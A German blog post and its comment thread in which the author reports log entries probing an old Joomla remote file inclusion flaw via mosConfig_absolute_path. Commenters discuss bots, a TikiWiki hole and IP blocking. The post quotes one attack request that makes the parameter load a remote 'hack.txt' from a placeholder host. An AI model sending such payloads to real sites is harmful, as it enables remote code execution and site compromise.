Joomla CMS Hack

Von Mike Schnoor am 12. Februar 2008

Ich nutze hier im Blog definitiv WordPress, aber zahlreiche Anfragen werden auf nicht-existente URLs gemacht, die wohl irgendwie eine Hintertür beim Joomla CMS öffnen sollen. Hier ein Beispiel:

/////////////?mosConfig_absolute_path=http://sonstwo.server.com/hack.txt

Scheinbar ist die mosConfig_absolute_path im Joomla CMS oder in veralteten Versionen absolut anfällig für zwischenmenschliche Schandtaten… naja, das wollte ich auch nur mal so mitteilen.

Kategorien: Blogkultur
Stichwörter: , , , , , , ,

Hat Dir der Artikel gefallen?

Teile diesen Artikel mit Deinen Freunde bei Facebook oder Twitter:

Kopiere diesen Trackback-Link in Deine Blogsoftware, um auf diesen Artikel hinzuweisen. Für die eigentliche Verlinkung zu diesem Artikel nutze innerhalb Deines eigenen Blogeintrags bitte den Permalink.

Diesen Artikel kommentieren





Hinweis:
Mit dem Absenden Deines Kommentars willigst Du ein, dass der angegebene Name, die E-Mail-Adresse und die IP-Adresse, die Deinem Internetanschluss aktuell zugewiesen ist, im Zusammenhang mit Deinem Kommentar digital gespeichert werden. Die E-Mail-Adresse und die IP-Adresse werden natürlich nicht veröffentlicht oder an Dritte weitergegeben. Mehr hierzu in den Datenschutzhinweisen. Beachte bitte vor dem Absenden eines Kommentars den entsprechenden Hinweis zu manuellen Trackbacks und zu Kommentaren mit werblichem Charakter.

6 Antworten

  1. Pepino:
    12.02.2008, 22:25 Uhr

    Kann ich nur Bestätigen (die Einbruchsversuche)… allerdings scheinen die Täter nicht viel Know-How zu besitzen…

  2. Mike Schnoor:
    12.02.2008, 22:26 Uhr

    Ich möchte ja fast diese dilletantistischen Momente so richtig an den Pranger stellen und die IPs preisgeben, aber näää… :P

  3. Pepino:
    12.02.2008, 22:37 Uhr

    Ich veröffentliche manchmal Anweisungen für die .htaccess-Datei… das befriedigt auch ;-)

  4. Moellus:
    12.02.2008, 22:40 Uhr

    Diese bots tun nix, die wollen nur spielen. grep mal nach tikiwiki.
    So, ick muss twittern.

  5. Michael:
    13.02.2008, 15:28 Uhr

    Mir graut es jedesmal wenn ich in meine Logfiles schaue. Was da an “Angriffen” reinkommt ist nicht mehr lustig und es wird subjektiv immer mehr.

    @Moellus:

    Ist das gemeint: “Eine Schwachstelle in TikiWiki 1.9.8 kann von einem Angreifer dazu ausgenutzt werden, beliebigen Programmcode auf dem beherbergenden Rechnersystem auszuführen. Es ist bereits funktionierender Exploit Code in Umlauf und die Schwachstelle wird bereits aktiv ausgenutzt. Es ist noch kein Patch verfügbar, …”?

  6. Xel:
    15.02.2008, 23:50 Uhr

    Och – das ist ne alte Lücke… müsste aber schon lange gestopft sein… (wobei denkbar währe, dass es eigentlich eher ne Mambo Lücke war – kann ich aber nicht genau sagen) so ungefähr seit Joomla eine Register Globals = “Off” Emulation hat ;-)

    “allerdings scheinen die Täter nicht viel Know-How zu besitzen…”
    Glaubst du? Es ist weniger Aufwand den “Hack”versuch direkt zu begehen, als erst die Startseite zu laden und zu versuchen herauszufinden, ob denn das Zielsystem installiert ist.

    Was IPs angeht… Botnetze und Zobierechner sowie wechselnde IPs machen einem das Leben manchmal zur Hölle, wenn man IPs blocken möchte ;-)